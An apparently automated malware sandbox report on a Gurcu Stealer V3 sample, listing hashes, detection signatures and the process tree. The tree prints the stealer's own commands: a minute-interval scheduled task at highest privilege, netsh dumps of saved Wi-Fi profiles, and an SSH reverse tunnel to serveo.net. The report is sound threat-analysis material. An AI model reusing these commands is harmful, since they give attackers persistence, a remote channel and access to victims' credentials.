Analysis
-
max time kernel
147s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
05-10-2023 21:51
Behavioral task
behavioral1
Sample
1edb8aa1adacda31bc98064b1634ddea.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
1edb8aa1adacda31bc98064b1634ddea.exe
Resource
win10v2004-20230915-en
General
-
Target
1edb8aa1adacda31bc98064b1634ddea.exe
-
Size
225KB
-
MD5
1edb8aa1adacda31bc98064b1634ddea
-
SHA1
7dc5aee1dd577b61a41a5001d465f0606bb33618
-
SHA256
fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575
-
SHA512
26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a
-
SSDEEP
3072:GQ2NGV19gqU3pJpfYTCOoShKmECPTKBWFPkl6WQre9Q29bSHXGhrD9HA2AF+q73o:uGDCOoSEmkWeILe9z9bS30AzHe0
Malware Config
Signatures
-
Detect Gurcu Stealer V3 payload 4 IoCs
resource yara_rule behavioral2/memory/2876-0-0x000002B111240000-0x000002B11127E000-memory.dmp family_gurcu_v3 behavioral2/files/0x0007000000023037-9.dat family_gurcu_v3 behavioral2/files/0x0007000000023037-8.dat family_gurcu_v3 behavioral2/files/0x0007000000023037-17.dat family_gurcu_v3 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation 1edb8aa1adacda31bc98064b1634ddea.exe -
Executes dropped EXE 2 IoCs
pid Process 2384 1edb8aa1adacda31bc98064b1634ddea.exe 4468 1edb8aa1adacda31bc98064b1634ddea.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1edb8aa1adacda31bc98064b1634ddea.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1edb8aa1adacda31bc98064b1634ddea.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1edb8aa1adacda31bc98064b1634ddea.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1edb8aa1adacda31bc98064b1634ddea.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1edb8aa1adacda31bc98064b1634ddea.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1edb8aa1adacda31bc98064b1634ddea.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 ip-api.com 77 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2584 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3636 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2384 1edb8aa1adacda31bc98064b1634ddea.exe 2384 1edb8aa1adacda31bc98064b1634ddea.exe 4468 1edb8aa1adacda31bc98064b1634ddea.exe 4468 1edb8aa1adacda31bc98064b1634ddea.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2876 1edb8aa1adacda31bc98064b1634ddea.exe Token: SeDebugPrivilege 2384 1edb8aa1adacda31bc98064b1634ddea.exe Token: SeDebugPrivilege 4468 1edb8aa1adacda31bc98064b1634ddea.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2876 wrote to memory of 672 2876 1edb8aa1adacda31bc98064b1634ddea.exe 86 PID 2876 wrote to memory of 672 2876 1edb8aa1adacda31bc98064b1634ddea.exe 86 PID 672 wrote to memory of 904 672 cmd.exe 88 PID 672 wrote to memory of 904 672 cmd.exe 88 PID 672 wrote to memory of 3636 672 cmd.exe 89 PID 672 wrote to memory of 3636 672 cmd.exe 89 PID 672 wrote to memory of 2584 672 cmd.exe 90 PID 672 wrote to memory of 2584 672 cmd.exe 90 PID 672 wrote to memory of 2384 672 cmd.exe 91 PID 672 wrote to memory of 2384 672 cmd.exe 91 PID 2384 wrote to memory of 2176 2384 1edb8aa1adacda31bc98064b1634ddea.exe 93 PID 2384 wrote to memory of 2176 2384 1edb8aa1adacda31bc98064b1634ddea.exe 93 PID 2176 wrote to memory of 4296 2176 cmd.exe 94 PID 2176 wrote to memory of 4296 2176 cmd.exe 94 PID 2176 wrote to memory of 3388 2176 cmd.exe 95 PID 2176 wrote to memory of 3388 2176 cmd.exe 95 PID 2176 wrote to memory of 3940 2176 cmd.exe 96 PID 2176 wrote to memory of 3940 2176 cmd.exe 96 PID 2384 wrote to memory of 2208 2384 1edb8aa1adacda31bc98064b1634ddea.exe 98 PID 2384 wrote to memory of 2208 2384 1edb8aa1adacda31bc98064b1634ddea.exe 98 PID 2208 wrote to memory of 3688 2208 cmd.exe 100 PID 2208 wrote to memory of 3688 2208 cmd.exe 100 PID 2208 wrote to memory of 2060 2208 cmd.exe 101 PID 2208 wrote to memory of 2060 2208 cmd.exe 101 PID 2208 wrote to memory of 3380 2208 cmd.exe 102 PID 2208 wrote to memory of 3380 2208 cmd.exe 102 PID 2384 wrote to memory of 2020 2384 1edb8aa1adacda31bc98064b1634ddea.exe 104 PID 2384 wrote to memory of 2020 2384 1edb8aa1adacda31bc98064b1634ddea.exe 104 PID 4468 wrote to memory of 4788 4468 1edb8aa1adacda31bc98064b1634ddea.exe 116 PID 4468 wrote to memory of 4788 4468 1edb8aa1adacda31bc98064b1634ddea.exe 116 PID 4788 wrote to memory of 384 4788 cmd.exe 118 PID 4788 wrote to memory of 384 4788 cmd.exe 118 PID 4788 wrote to memory of 2888 4788 cmd.exe 119 PID 4788 wrote to memory of 2888 4788 cmd.exe 119 PID 4788 wrote to memory of 3252 4788 cmd.exe 120 PID 4788 wrote to memory of 3252 4788 cmd.exe 120 PID 4468 wrote to memory of 1976 4468 1edb8aa1adacda31bc98064b1634ddea.exe 121 PID 4468 wrote to memory of 1976 4468 1edb8aa1adacda31bc98064b1634ddea.exe 121 PID 1976 wrote to memory of 408 1976 cmd.exe 123 PID 1976 wrote to memory of 408 1976 cmd.exe 123 PID 1976 wrote to memory of 3156 1976 cmd.exe 125 PID 1976 wrote to memory of 3156 1976 cmd.exe 125 PID 1976 wrote to memory of 2464 1976 cmd.exe 124 PID 1976 wrote to memory of 2464 1976 cmd.exe 124 PID 4468 wrote to memory of 1352 4468 1edb8aa1adacda31bc98064b1634ddea.exe 126 PID 4468 wrote to memory of 1352 4468 1edb8aa1adacda31bc98064b1634ddea.exe 126 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1edb8aa1adacda31bc98064b1634ddea.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1edb8aa1adacda31bc98064b1634ddea.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe"C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "1edb8aa1adacda31bc98064b1634ddea" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:904
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:3636
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "1edb8aa1adacda31bc98064b1634ddea" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2584
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:4296
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:3388
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:3940
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:3688
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵PID:2060
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:3380
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6977 serveo.net4⤵PID:2020
-
-
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exeC:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe1⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4468 -
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"2⤵
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:384
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵PID:2888
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"3⤵PID:3252
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:408
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"3⤵PID:2464
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid3⤵PID:3156
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6977 serveo.net2⤵PID:1352
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
406B
MD5ec266d309cbad86b3e4939f2117dfe39
SHA1cf12599fbdc167b4c01b518a0bd63d51cd83798b
SHA2562f8ecca5380615bcd1530817933a7ea03d2d4fdc7d6e634829aa54e40413b05d
SHA512d2d39d9174f459146de57c205979e7815829c37eafd214cdce88f90a961f04e5468290e530cf31b9b621276a86eb3a071bbf3464962e1a8e44a7478794571baa
-
Filesize
847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
225KB
MD51edb8aa1adacda31bc98064b1634ddea
SHA17dc5aee1dd577b61a41a5001d465f0606bb33618
SHA256fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575
SHA51226601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a
-
Filesize
225KB
MD51edb8aa1adacda31bc98064b1634ddea
SHA17dc5aee1dd577b61a41a5001d465f0606bb33618
SHA256fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575
SHA51226601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a
-
Filesize
225KB
MD51edb8aa1adacda31bc98064b1634ddea
SHA17dc5aee1dd577b61a41a5001d465f0606bb33618
SHA256fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575
SHA51226601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a
-
Filesize
4B
MD5312f1ba2a72318edaaa995a67835fad5
SHA18761e8e1ab69dd4c5916970977eae3b5877396e2
SHA256ab2a4711117d0c7bb2a82d84ccfcdd6b172746f5859a14ebb111c4636cdf1fd2
SHA51257557536fd5ad3c0d17347814786a7cc0d6530a2e7eba7559e9b6ad784721188b9a88419f5fdd10b21377883c40a82a558331624dd21734816b50062838ffbf9